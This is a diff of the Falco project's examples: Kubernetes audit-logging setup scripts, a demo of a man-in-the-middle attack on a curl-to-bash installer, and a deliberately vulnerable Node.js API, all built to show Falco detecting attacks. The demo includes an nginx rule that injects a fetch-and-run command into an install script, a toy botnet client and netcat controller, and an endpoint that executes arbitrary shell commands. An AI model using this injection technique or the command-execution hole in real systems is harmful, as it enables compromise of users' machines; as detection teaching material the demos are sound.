+This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
+Either using static audit backends in Kubernetes 1.11, or in Kubernetes 1.13 with dynamic sink which configures webhook backends through an AuditSink API object.
+
+<!-- toc -->
+
+- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
+  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
+  * [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
+  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
+  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
+- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
+  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
+  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
+  * [Deploy AuditSink objects](#deploy-auditsink-objects)
+  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
+- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
+
+<!-- tocstop -->
+
+## Instructions for Kubernetes 1.11
+
+The main steps are:
+
+1. Deploy Falco to your Kubernetes cluster
+1. Define your audit policy and webhook configuration
+1. Restart the API Server to enable Audit Logging
+1. Observe Kubernetes audit events at falco
+
+### Deploy Falco to your Kubernetes cluster
+
+Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a falco service account, service, configmap, and daemonset.
+
+### Define your audit policy and webhook configuration
+
+The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
+
+* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
+* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to an ip associated with the falco service, port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
+
+Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
+
+```
+FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
+```
+
+### Restart the API Server to enable Audit Logging
+
+A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling audit log support for the apiserver, including copying the audit policy/webhook files to the apiserver machine, modifying the apiserver command line to add `--audit-log-path`, `--audit-policy-file`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
+
+It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
+
+* `minikube`
+* `kops`
+
+When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
+
+Its output looks like this:
+
+```
+$ bash enable-k8s-audit.sh minikube static
+***Copying apiserver config patch script to apiserver...
+apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
+***Copying audit policy/webhook files to apiserver...
+audit-policy.yaml                                                                           100% 2519     1.2MB/s   00:00
+webhook-config.yaml                                                                         100%  248   362.0KB/s   00:00
+***Modifying k8s apiserver config (will result in apiserver restarting)...
+***Done!
+$
+```
+### Observe Kubernetes audit events at falco
+
+Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
+
+## Instructions for Kubernetes 1.13
+
+The main steps are:
+
+1. Deploy Falco to your Kubernetes cluster
+2. Restart the API Server to enable Audit Logging
+3. Deploy the AuditSink object for your audit policy and webhook configuration
+4. Observe Kubernetes audit events at falco
+
+### Deploy Falco to your Kubernetes cluster
+
+Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
+
+### Restart the API Server to enable Audit Logging
+
+A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling dynamic audit support for the apiserver by modifying the apiserver command line to add `--audit-dynamic-configuration`, `--feature-gates=DynamicAuditing=true`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
+
+It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
+
+* `minikube`
+* `kops`
+
+When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
+
+Its output looks like this:
+
+```
+$ bash enable-k8s-audit.sh minikube dynamic
+***Copying apiserver config patch script to apiserver...
+apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
+***Modifying k8s apiserver config (will result in apiserver restarting)...
+***Done!
+$
+```
+
+### Deploy AuditSink objects
+
+[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
+
+Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
+
+```
+FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
+```
+
+### Observe Kubernetes audit events at falco
+
+Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
+
+## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
+
+If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
+
+```
+***Copying apiserver config patch script to apiserver...
+apiserver-config.patch.sh                                                                          100% 2211   662.9KB/s   00:00
+***Copying audit policy file to apiserver...
+audit-policy.yaml                                                                                  100% 2519   847.7KB/s   00:00
+***Modifying k8s apiserver config (will result in apiserver restarting)...
+***Done!
+```
+
+The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.

examples/k8s_audit_config/apiserver-config.patch.sh

@@ -0,0 +1,72 @@
+#!/usr/bin/env bash
+
+set -euo pipefail
+
+IFS=''
+
+FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
+VARIANT=${2:-minikube}
+AUDIT_TYPE=${3:-static}
+
+if [ "$AUDIT_TYPE" == "static" ]; then
+    if grep audit-webhook-config-file "$FILENAME" ; then
+	echo audit-webhook patch already applied
+	exit 0
+    fi
+else
+    if grep audit-dynamic-configuration "$FILENAME" ; then
+	echo audit-dynamic-configuration patch already applied
+	exit 0
+    fi
+fi
+
+TMPFILE="/tmp/kube-apiserver.yaml.patched"
+rm -f "$TMPFILE"
+
+APISERVER_PREFIX="    -"
+APISERVER_LINE="- kube-apiserver"
+
+if [ "$VARIANT" == "kops" ]; then
+    APISERVER_PREFIX="     "
+    APISERVER_LINE="/usr/local/bin/kube-apiserver"
+fi
+
+while read -r LINE
+do
+    echo "$LINE" >> "$TMPFILE"
+    case "$LINE" in
+        *$APISERVER_LINE*)
+	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
+		echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
+		echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
+		if [[ $AUDIT_TYPE == "static" ]]; then
+		    echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
+		    echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
+		fi
+	    fi
+	    if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
+		echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
+		echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
+		echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
+	    fi
+            ;;
+        *"volumeMounts:"*)
+	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
+		echo "    - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
+		echo "      name: data" >> "$TMPFILE"
+	    fi
+            ;;
+        *"volumes:"*)
+	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
+		echo "  - hostPath:" >> "$TMPFILE"
+		echo "      path: /var/lib/k8s_audit" >> "$TMPFILE"
+		echo "    name: data" >> "$TMPFILE"
+	    fi
+            ;;
+
+    esac
+done < "$FILENAME"
+
+cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
+cp "$TMPFILE" "$FILENAME"
+

examples/k8s_audit_config/audit-policy.yaml

@@ -0,0 +1,76 @@
+apiVersion: audit.k8s.io/v1beta1 # This is required.
+kind: Policy
+# Don't generate audit events for all requests in RequestReceived stage.
+omitStages:
+  - "RequestReceived"
+rules:
+  # Log pod changes at RequestResponse level
+  - level: RequestResponse
+    resources:
+    - group: ""
+      # Resource "pods" doesn't match requests to any subresource of pods,
+      # which is consistent with the RBAC policy.
+      resources: ["pods", "deployments"]
+
+  - level: RequestResponse
+    resources:
+    - group: "rbac.authorization.k8s.io"
+      # Resource "pods" doesn't match requests to any subresource of pods,
+      # which is consistent with the RBAC policy.
+      resources: ["clusterroles", "clusterrolebindings"]
+
+  # Log "pods/log", "pods/status" at Metadata level
+  - level: Metadata
+    resources:
+    - group: ""
+      resources: ["pods/log", "pods/status"]
+
+  # Don't log requests to a configmap called "controller-leader"
+  - level: None
+    resources:
+    - group: ""
+      resources: ["configmaps"]
+      resourceNames: ["controller-leader"]
+
+  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
+  - level: None
+    users: ["system:kube-proxy"]
+    verbs: ["watch"]
+    resources:
+    - group: "" # core API group
+      resources: ["endpoints", "services"]
+
+  # Don't log authenticated requests to certain non-resource URL paths.
+  - level: None
+    userGroups: ["system:authenticated"]
+    nonResourceURLs:
+    - "/api*" # Wildcard matching.
+    - "/version"
+
+  # Log the request body of configmap changes in kube-system.
+  - level: Request
+    resources:
+    - group: "" # core API group
+      resources: ["configmaps"]
+    # This rule only applies to resources in the "kube-system" namespace.
+    # The empty string "" can be used to select non-namespaced resources.
+    namespaces: ["kube-system"]
+
+  # Log configmap and secret changes in all other namespaces at the RequestResponse level.
+  - level: RequestResponse
+    resources:
+    - group: "" # core API group
+      resources: ["secrets", "configmaps"]
+
+  # Log all other resources in core and extensions at the Request level.
+  - level: Request
+    resources:
+    - group: "" # core API group
+    - group: "extensions" # Version of group should NOT be included.
+
+  # A catch-all rule to log all other requests at the Metadata level.
+  - level: Metadata
+    # Long-running requests like watches that fall under this rule will not
+    # generate an audit event in RequestReceived.
+    omitStages:
+      - "RequestReceived"

examples/k8s_audit_config/audit-sink.yaml.in

@@ -0,0 +1,16 @@
+apiVersion: auditregistration.k8s.io/v1alpha1
+kind: AuditSink
+metadata:
+  name: falco-audit-sink
+spec:
+  policy:
+    level: RequestResponse
+    stages:
+      - ResponseComplete
+      - ResponseStarted
+  webhook:
+    throttle:
+      qps: 10
+      burst: 15
+    clientConfig:
+      url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"

examples/k8s_audit_config/enable-k8s-audit.sh

@@ -0,0 +1,46 @@
+#!/usr/bin/env bash
+
+set -euo pipefail
+
+VARIANT=${1:-minikube}
+AUDIT_TYPE=${2:-static}
+
+if [ "$VARIANT" == "minikube" ]; then
+    APISERVER_HOST=$(minikube ip)
+    SSH_KEY=$(minikube ssh-key)
+    SSH_USER="docker"
+    MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
+fi
+
+if [ "$VARIANT" == "kops" ]; then
+    # APISERVER_HOST=api.your-kops-cluster-name.com
+    SSH_KEY=~/.ssh/id_rsa
+    SSH_USER="admin"
+    MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
+
+    if [ -z "${APISERVER_HOST+xxx}" ]; then
+	echo "***You must specify APISERVER_HOST with the name of your kops api server"
+	exit 1
+    fi
+fi
+
+echo "***Copying apiserver config patch script to apiserver..."
+ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
+scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
+
+if [ "$AUDIT_TYPE" == "static" ]; then
+    echo "***Copying audit policy/webhook files to apiserver..."
+    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
+    scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
+fi
+
+if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
+    echo "***Copying audit policy file to apiserver..."
+    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
+fi
+
+echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
+
+ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
+
+echo "***Done!"

examples/k8s_audit_config/webhook-config.yaml.in

@@ -0,0 +1,14 @@
+apiVersion: v1
+kind: Config
+clusters:
+- name: falco
+  cluster:
+    server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
+contexts:
+- context:
+    cluster: falco
+    user: ""
+  name: default-context
+current-context: default-context
+preferences: {}
+users: []

examples/mitm-sh-installer/README.md

@@ -0,0 +1,78 @@
+# Demo of falco with man-in-the-middle attacks on installation scripts
+
+For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
+
+## Demo architecture
+
+### Initial setup
+
+Make sure no prior `botnet_client.py` processes are lying around.
+
+### Start everything using docker-compose
+
+From this directory, run the following:
+
+```
+$ docker-compose -f demo.yml up
+```
+
+This starts the following containers:
+* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
+* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
+* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
+* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
+* falco: will detect the activities of botnet_client.py.
+
+### Download `install-software.sh`, see botnet client running
+
+Run the following to fetch and execute the installation script,
+which also installs the botnet client:
+
+```
+$ curl http://localhost/install-software.sh | bash
+```
+
+You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
+
+Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
+
+```
+$ ps auxww  | grep python
+...
+root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py
+
+$ telnet localhost 1234
+Trying ::1...
+Trying 127.0.0.1...
+Connected to localhost.
+Escape character is '^]'.
+```
+
+You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
+
+```
+attacker_botnet_master | Trying to contact compromised machine...
+attacker_botnet_master | Waiting for botnet command and control commands...
+attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
+attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
+```
+
+At this point, kill the botnet_client.py process to clean things up.
+
+### Run installation script again using `fbash`, note falco warnings.
+
+If you run the installation script again:
+
+```
+curl http://localhost/install-software.sh | ./fbash
+```
+
+In the docker-compose output, you'll see the following falco warnings:
+
+```
+falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
+falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
+falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
+falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
+falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
+```

examples/mitm-sh-installer/botnet_master.sh

@@ -0,0 +1,7 @@
+#!/bin/sh
+
+while true; do
+    echo "Trying to contact compromised machine..."
+    echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
+    sleep 5
+done

examples/mitm-sh-installer/demo.yml

@@ -0,0 +1,51 @@
+# Owned by software vendor, serving install-software.sh.
+apache:
+  container_name: apache
+  image: httpd:2.4
+  volumes:
+        - ${PWD}/web_root:/usr/local/apache2/htdocs
+
+# Owned by software vendor, compromised by attacker.
+nginx:
+  container_name: mitm_nginx
+  image: nginx:latest
+  links:
+    - apache
+  ports:
+      - "80:80"
+  volumes:
+        - ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
+
+# Owned by attacker.
+evil_apache:
+  container_name: evil_apache
+  image: httpd:2.4
+  volumes:
+        - ${PWD}/evil_web_root:/usr/local/apache2/htdocs
+  ports:
+      - "9090:80"
+
+# Owned by attacker, constantly trying to contact client.
+attacker_botnet_master:
+  container_name: attacker_botnet_master
+  image: alpine:latest
+  net: host
+  volumes:
+    - ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
+  command:
+    - /tmp/botnet_master.sh
+
+# Owned by client, detects attack by attacker
+falco:
+  container_name: falco
+  image: falcosecurity/falco:latest
+  privileged: true
+  volumes:
+    - /var/run/docker.sock:/host/var/run/docker.sock
+    - /dev:/host/dev
+    - /proc:/host/proc:ro
+    - /boot:/host/boot:ro
+    - /lib/modules:/host/lib/modules:ro
+    - /usr:/host/usr:ro
+    - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
+  tty: true

examples/mitm-sh-installer/evil_web_root/botnet_client.py

@@ -0,0 +1,18 @@
+import socket;
+import signal;
+import os;
+
+os.close(0);
+os.close(1);
+os.close(2);
+
+signal.signal(signal.SIGINT,signal.SIG_IGN);
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+serversocket.bind(('0.0.0.0', 1234))
+serversocket.listen(5);
+while 1:
+    (clientsocket, address) = serversocket.accept();
+    clientsocket.send('Waiting for botnet command and control commands...\n');
+    command = clientsocket.recv(1024)
+    clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
+    clientsocket.close()

examples/mitm-sh-installer/fbash

@@ -0,0 +1,15 @@
+#!/bin/bash
+
+SID=`ps --no-heading -o sess --pid $$`
+
+if [ $SID -ne $$ ]; then
+    # Not currently a session leader? Run a copy of ourself in a new
+    # session, with copies of stdin/stdout/stderr.
+    setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
+    FBASH=$!
+    trap "kill $FBASH; exit" SIGINT SIGTERM
+    wait $FBASH
+else
+    # Just evaluate the commands (from stdin)
+    source /dev/stdin
+fi

examples/mitm-sh-installer/nginx.conf

@@ -0,0 +1,12 @@
+http {
+    server {
+        location / {
+            sub_filter_types '*';
+            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
+            sub_filter_once off;
+            proxy_pass http://apache:80;
+        }
+    }
+}
+events {
+}

examples/mitm-sh-installer/web_root/install-software.sh

@@ -0,0 +1,156 @@
+#!/bin/bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+set -e
+
+function install_rpm {
+	if ! hash curl > /dev/null 2>&1; then
+		echo "* Installing curl"
+		yum -q -y install curl
+	fi
+
+	echo "*** Installing my-software public key"
+	# A rpm --import command would normally be here
+
+	echo "*** Installing my-software repository"
+	# A curl path-to.repo <some url> would normally be here
+
+	echo "*** Installing my-software"
+	# A yum -q -y install my-software command would normally be here
+
+	echo "*** my-software Installed!"
+}
+
+function install_deb {
+	export DEBIAN_FRONTEND=noninteractive
+
+	if ! hash curl > /dev/null 2>&1; then
+		echo "* Installing curl"
+		apt-get -qq -y install curl < /dev/null
+	fi
+
+	echo "*** Installing my-software public key"
+	# A curl <url> | apt-key add - command would normally be here
+
+	echo "*** Installing my-software repository"
+	# A curl path-to.list <some url> would normally be here
+
+	echo "*** Installing my-software"
+	# An apt-get -qq -y install my-software command would normally be here
+
+	echo "*** my-software Installed!"
+}
+
+function unsupported {
+	echo 'Unsupported operating system. Please consider writing to the mailing list at'
+	echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
+	echo 'installation.'
+	exit 1
+}
+
+if [ $(id -u) != 0 ]; then
+	echo "Installer must be run as root (or with sudo)."
+#	exit 1
+fi
+
+echo "* Detecting operating system"
+
+ARCH=$(uname -m)
+if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
+	unsupported
+fi
+
+if [ -f /etc/debian_version ]; then
+	if [ -f /etc/lsb-release ]; then
+		. /etc/lsb-release
+		DISTRO=$DISTRIB_ID
+		VERSION=${DISTRIB_RELEASE%%.*}
+	else
+		DISTRO="Debian"
+		VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
+	fi
+
+	case "$DISTRO" in
+
+		"Ubuntu")
+			if [ $VERSION -ge 10 ]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		"LinuxMint")
+			if [ $VERSION -ge 9 ]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		"Debian")
+			if [ $VERSION -ge 6 ]; then
+				install_deb
+			elif [[ $VERSION == *sid* ]]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		*)
+			unsupported
+			;;
+
+	esac
+
+elif [ -f /etc/system-release-cpe ]; then
+	DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
+	VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
+
+	case "$DISTRO" in
+
+		"oracle" | "centos" | "redhat")
+			if [ $VERSION -ge 6 ]; then
+				install_rpm
+			else
+				unsupported
+			fi
+			;;
+
+		"amazon")
+			install_rpm
+			;;
+
+		"fedoraproject")
+			if [ $VERSION -ge 13 ]; then
+				install_rpm
+			else
+				unsupported
+			fi
+			;;
+
+		*)
+			unsupported
+			;;
+
+	esac
+
+else
+	unsupported
+fi

examples/nodejs-bad-rest-api/README.md

@@ -0,0 +1,66 @@
+# Demo of falco with bash exec via poorly designed REST API.
+
+## Introduction
+
+This example shows how a server could have a poorly designed API that
+allowed a client to execute arbitrary programs on the server, and how
+that behavior can be detected using Sysdig Falco.
+
+`server.js` in this directory defines the server. The poorly designed
+API is this route handler:
+
+```javascript
+router.get('/exec/:cmd', function(req, res) {
+    var output = child_process.execSync(req.params.cmd);
+    res.send(output);
+});
+
+app.use('/api', router);
+```
+
+It blindly takes the url portion after `/api/exec/<cmd>` and tries to
+execute it. A horrible design choice(!), but allows us to easily show
+Sysdig falco's capabilities.
+
+## Demo architecture
+
+### Start everything using docker-compose
+
+From this directory, run the following:
+
+```
+$ docker-compose -f demo.yml up
+```
+
+This starts the following containers:
+
+* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
+* falco: will detect when you execute a shell via the express server.
+
+### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
+
+Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
+
+```
+$ curl http://localhost:8181/api/exec/ls
+
+demo.yml
+node_modules
+package.json
+README.md
+server.js
+```
+
+```
+$ curl http://localhost:8181/api/exec/pwd
+
+.../examples/nodejs-bad-rest-api
+```
+
+### Try to run bash via `/api/exec/bash`, falco sends alert.
+
+If you try to run bash via `/api/exec/bash`, falco will generate an alert:
+
+```
+falco          | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
+```

examples/nodejs-bad-rest-api/demo.yml

@@ -0,0 +1,21 @@
+express_server:
+  container_name: express_server
+  image: node:latest
+  command: bash -c "apt-get -y update && apt-get -y install runit && cd /usr/src/app && npm install && runsv /usr/src/app"
+  ports:
+    - "8181:8181"
+  volumes:
+        - ${PWD}:/usr/src/app
+
+falco:
+  container_name: falco
+  image: falcosecurity/falco:latest
+  privileged: true
+  volumes:
+    - /var/run/docker.sock:/host/var/run/docker.sock
+    - /dev:/host/dev
+    - /proc:/host/proc:ro
+    - /boot:/host/boot:ro
+    - /lib/modules:/host/lib/modules:ro
+    - /usr:/host/usr:ro
+  tty: true

examples/nodejs-bad-rest-api/package.json

@@ -0,0 +1,7 @@
+{
+    "name": "bad-rest-api",
+    "main": "server.js",
+    "dependencies": {
+        "express": "~4.16.0"
+    }
+}

examples/nodejs-bad-rest-api/run

@@ -0,0 +1,2 @@
+#!/bin/sh
+node server.js

examples/nodejs-bad-rest-api/server.js

@@ -0,0 +1,25 @@
+var express    = require('express');        // call express
+var app        = express();                 // define our app using express
+var child_process = require('child_process');
+
+var port = process.env.PORT || 8181;        // set our port
+
+// ROUTES FOR OUR API
+// =============================================================================
+var router = express.Router();              // get an instance of the express Router
+
+// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
+router.get('/', function(req, res) {
+    res.json({ message: 'API available'});
+});
+
+router.get('/exec/:cmd', function(req, res) {
+    var ret = child_process.spawnSync(req.params.cmd, { shell: true});
+    res.send(ret.stdout);
+});
+
+app.use('/api', router);
+
+app.listen(port);
+console.log('Server running on port: ' + port);
+

integrations/OWNERS

@@ -0,0 +1,2 @@
+labels:
+  - area/integration

integrations/anchore-falco/Dockerfile

@@ -0,0 +1,13 @@
+FROM python:3-stretch
+
+RUN pip install pipenv
+
+WORKDIR /app
+
+ADD Pipfile /app/Pipfile
+ADD Pipfile.lock /app/Pipfile.lock
+RUN pipenv install --system --deploy
+
+ADD . /app
+
+CMD ["python", "main.py"]

integrations/anchore-falco/Pipfile

@@ -0,0 +1,16 @@
+[[source]]
+url = "https://pypi.python.org/simple"
+verify_ssl = true
+name = "pypi"
+
+[dev-packages]
+doublex-expects = "==0.7.0rc2"
+doublex = "*"
+mamba = "*"
+expects = "*"
+
+[packages]
+requests = "*"
+
+[requires]
+python_version = "3.7"

integrations/anchore-falco/Pipfile.lock

@@ -0,0 +1,161 @@
+{
+    "_meta": {
+        "hash": {
+            "sha256": "3bdeb3ebfc2760431a59b0a27dc9e747b5d21f9156591ebb7994d94c21f33648"
+        },
+        "pipfile-spec": 6,
+        "requires": {
+            "python_version": "3.7"
+        },
+        "sources": [
+            {
+                "name": "pypi",
+                "url": "https://pypi.python.org/simple",
+                "verify_ssl": true
+            }
+        ]
+    },
+    "default": {
+        "certifi": {
+            "hashes": [
+                "sha256:59b7658e26ca9c7339e00f8f4636cdfe59d34fa37b9b04f6f9e9926b3cece1a5",
+                "sha256:b26104d6835d1f5e49452a26eb2ff87fe7090b89dfcaee5ea2212697e1e1d7ae"
+            ],
+            "version": "==2019.3.9"
+        },
+        "chardet": {
+            "hashes": [
+                "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae",
+                "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"
+            ],
+            "version": "==3.0.4"
+        },
+        "idna": {
+            "hashes": [
+                "sha256:c357b3f628cf53ae2c4c05627ecc484553142ca23264e593d327bcde5e9c3407",
+                "sha256:ea8b7f6188e6fa117537c3df7da9fc686d485087abf6ac197f9c46432f7e4a3c"
+            ],
+            "version": "==2.8"
+        },
+        "requests": {
+            "hashes": [
+                "sha256:502a824f31acdacb3a35b6690b5fbf0bc41d63a24a45c4004352b0242707598e",
+                "sha256:7bf2a778576d825600030a110f3c0e3e8edc51dfaafe1c146e39a2027784957b"
+            ],
+            "index": "pypi",
+            "version": "==2.21.0"
+        },
+        "urllib3": {
+            "hashes": [
+                "sha256:2393a695cd12afedd0dcb26fe5d50d0cf248e5a66f75dbd89a3d4eb333a61af4",
+                "sha256:a637e5fae88995b256e3409dc4d52c2e2e0ba32c42a6365fee8bbd2238de3cfb"
+            ],
+            "version": "==1.24.3"
+        }
+    },
+    "develop": {
